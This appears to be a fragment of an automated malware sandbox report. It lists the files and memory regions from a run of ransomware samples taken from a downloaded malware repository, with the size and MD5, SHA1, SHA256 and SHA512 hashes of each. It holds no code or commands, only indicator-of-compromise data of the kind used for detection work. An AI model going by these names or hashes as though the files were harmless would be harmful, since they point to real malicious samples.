                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                3KB

                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                c11138651d5cc5f768ef019f767f9891

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                f2c07ee2f5fad23f552d4a5e9bb3425f8dcfd0dc

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                a2e61e2e3c62c990365a30a71a86eec74ce6f3ffb0707f75b273335ea7fe6868

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                79a96de7e87b5e7d33f6c8a1d53b359d48e58f918d974da7d92832fd27f0b2757f2645561e6292062c562c8b8d27d873a87ac6afea15e823290db80f6208419c

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\74d7f43c1561fc1e.customDestinations-ms

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                1KB

                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                2a6f220eea0cb9c5571acb8011dda8f2

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                dcdcc5b06f3b502c3c14cfc32af4b35d3a128f08

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                8935c286ff198bb19a591cc632a8ecd154a40f8d4d85a131963729475c88464b

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                539e273d65e33512d2f8a8dfab843cf0900950fe1040d6770db0852d1b431a6e86e2cecf4760600ce6c4f2ec2cd2cdf5f440240833f3ae0b214d84fe5ebc3b45

                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                14KB

                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                2257fa8cef64a74c33655bd5f74ef5e5

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                b9f8baf96166f99cb1983563e632e6e69984ad5c

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                ead48b70e048de6ccca219a229ca90b49a9d1b9c14bf3a7c5eaad544294fcfd3

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                7792be9b935a46a923e97bb76b76957070e116dcc4cb6fcd8b883c2d6f142285ebc9fd26cdf29bd19c8bdff412487f586abaa1724332b613e71afa45d7f3e4f9

                                                                                                                                                                                                                              • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\ac\EVER\SearchHost.exe

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                1.6MB

                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                8add121fa398ebf83e8b5db8f17b45e0

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                c8107e5c5e20349a39d32f424668139a36e6cfd0

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                35c4a6c1474eb870eec901cef823cc4931919a4e963c432ce9efbb30c2d8a413

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                8f81c4552ff561eea9802e5319adcd6c7e5bdd1dc4c91e56fda6bdc9b7e8167b222500a0aee5cf27b0345d1c19ac9fa95ae4fd58d4c359a5232bcf86f03d2273

                                                                                                                                                                                                                              • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\ac\mssql.exe

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                10.2MB

                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                f6a3d38aa0ae08c3294d6ed26266693f

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                9ced15d08ffddb01db3912d8af14fb6cc91773f2

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                c522e0b5332cac67cde8fc84080db3b8f2e0fe85f178d788e38b35bbe4d464ad

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                814b1130a078dcb6ec59dbfe657724e36aa3db64ed9b2f93d8559b6a50e512365c8596240174141d6977b5ddcf7f281add7886c456dc7463c97f432507e73515

                                                                                                                                                                                                                              • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\ac\mssql2.exe

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                6.7MB

                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                f7d94750703f0c1ddd1edd36f6d0371d

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                cc9b95e5952e1c870f7be55d3c77020e56c34b57

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                659e441cadd42399fc286b92bbc456ff2e9ecb24984c0586acf83d73c772b45d

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                af0ced00dc6eeaf6fb3336d9b3abcc199fb42561b8ce24ff2e6199966ad539bc2387ba83a4838301594e50e36844796e96c30a9aa9ad5f03cf06860f3f44e0fa

                                                                                                                                                                                                                              • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\ac\nc123.exe

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                125KB

                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                597de376b1f80c06d501415dd973dcec

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                629c9649ced38fd815124221b80c9d9c59a85e74

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                f47e3555461472f23ab4766e4d5b6f6fd260e335a6abc31b860e569a720a5446

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                072565912208e97cc691e1a102e32fd6c243b5a3f8047a159e97aabbe302bddc36f3c52cecde3b506151bc89e0f3b5acf6552a82d83dac6e0180c873d36d3f6b

                                                                                                                                                                                                                              • C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\ac\xxcwclxsmzpjoa.sys

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                674KB

                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                b2233d1efb0b7a897ea477a66cd08227

                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                835a198a11c9d106fc6aabe26b9b3e59f6ec68fd

                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                5fd17e3b8827b5bb515343bc4066be0814f6466fb4294501becac284a378c0da

                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                6ca61854db877d767ce587ac3d7526cda8254d937a159fd985e0475d062d07ae83e7ff4f9f42c7e1e1cad5e1f408f6849866aa4e9e48b29d80510e5c695cee37

                                                                                                                                                                                                                              • memory/552-8977-0x0000000140000000-0x0000000140ACB000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                10.8MB

                                                                                                                                                                                                                              • memory/3184-40-0x0000000004F40000-0x0000000004F50000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                64KB

                                                                                                                                                                                                                              • memory/3184-34-0x0000000004F40000-0x0000000004F50000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                64KB

                                                                                                                                                                                                                              • memory/3184-33-0x0000000004F40000-0x0000000004F50000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                64KB

                                                                                                                                                                                                                              • memory/3184-35-0x0000000004F40000-0x0000000004F50000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                64KB

                                                                                                                                                                                                                              • memory/3184-36-0x0000000004F40000-0x0000000004F50000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                64KB

                                                                                                                                                                                                                              • memory/3184-37-0x0000000007C20000-0x0000000007C30000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                64KB

                                                                                                                                                                                                                              • memory/3184-77-0x0000000004F40000-0x0000000004F50000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                64KB

                                                                                                                                                                                                                              • memory/3184-38-0x0000000009D10000-0x0000000009D20000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                64KB

                                                                                                                                                                                                                              • memory/3184-58-0x00000000051B0000-0x00000000051C0000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                64KB

                                                                                                                                                                                                                              • memory/3184-39-0x0000000009D10000-0x0000000009D20000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                64KB

                                                                                                                                                                                                                              • memory/3184-42-0x0000000009D10000-0x0000000009D20000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                64KB

                                                                                                                                                                                                                              • memory/3184-41-0x0000000004F40000-0x0000000004F50000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                64KB

                                                                                                                                                                                                                              • memory/3988-23984-0x0000000000400000-0x000000000056F000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                1.4MB

                                                                                                                                                                                                                              • memory/3988-23618-0x0000000000400000-0x000000000056F000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                1.4MB

                                                                                                                                                                                                                              • memory/3988-8976-0x0000000000400000-0x000000000056F000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                1.4MB

                                                                                                                                                                                                                              • memory/4476-1617-0x0000000002DF0000-0x0000000002E58000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                416KB

                                                                                                                                                                                                                              • memory/4476-1625-0x0000000002DF0000-0x0000000002E58000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                416KB

                                                                                                                                                                                                                              • memory/4476-1628-0x0000000002DF0000-0x0000000002E58000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                416KB

                                                                                                                                                                                                                              • memory/5624-30793-0x0000000000400000-0x0000000000B02000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                7.0MB

                                                                                                                                                                                                                              • memory/5624-8978-0x0000000000400000-0x0000000000B02000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                7.0MB

                                                                                                                                                                                                                              • memory/5624-1724-0x0000000000400000-0x0000000000B02000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                7.0MB

                                                                                                                                                                                                                              • memory/6232-1651-0x0000000000400000-0x000000000056F000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                1.4MB

                                                                                                                                                                                                                              • memory/6232-8438-0x0000000000400000-0x000000000056F000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                1.4MB

                                                                                                                                                                                                                              • memory/6232-1806-0x0000000000400000-0x000000000056F000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                1.4MB

                                                                                                                                                                                                                              • memory/25052-30582-0x0000000000400000-0x00000000005DE000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                1.9MB

                                                                                                                                                                                                                              • memory/25052-25839-0x0000000000400000-0x00000000005DE000-memory.dmp

                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                1.9MB